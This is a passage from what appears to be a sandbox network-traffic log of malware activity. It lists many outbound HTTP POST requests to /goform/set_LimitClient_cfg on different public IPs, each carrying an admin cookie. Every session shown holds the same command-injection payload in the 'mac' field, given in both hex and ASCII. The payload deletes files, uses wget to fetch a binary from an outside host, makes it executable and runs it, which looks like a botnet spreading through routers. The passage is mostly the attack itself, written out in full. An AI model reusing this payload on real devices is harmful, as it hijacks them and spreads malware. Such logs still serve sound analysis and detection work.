                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3002192.168.2.234490681.231.134.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502877951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3003192.168.2.2352108218.230.42.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502924919 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3004192.168.2.2336914173.179.180.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502929926 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3005192.168.2.2338396119.89.206.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502933025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3006192.168.2.233543495.161.4.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503549099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3007192.168.2.2352368173.187.240.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503599882 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3008192.168.2.2335458169.68.181.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503669024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3009192.168.2.2341702157.103.200.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503703117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3010192.168.2.233824243.188.26.1218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503736019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3011192.168.2.2334298223.76.175.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503762007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3012192.168.2.2353604163.225.59.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503798008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3013192.168.2.234537846.55.42.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503861904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3014192.168.2.234678463.107.169.188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503880024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3015192.168.2.2354284130.7.172.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503892899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3016192.168.2.235132666.248.104.238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503909111 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3017192.168.2.2356546151.64.52.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503931046 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3018192.168.2.2343020141.43.91.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503950119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3019192.168.2.236058084.149.23.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503968954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3020192.168.2.234979036.155.72.1298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.503988028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3021192.168.2.2335720219.232.121.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504002094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3022192.168.2.2333994221.215.107.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504056931 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3023192.168.2.234401880.93.133.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504066944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3024192.168.2.235045857.190.25.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.504085064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
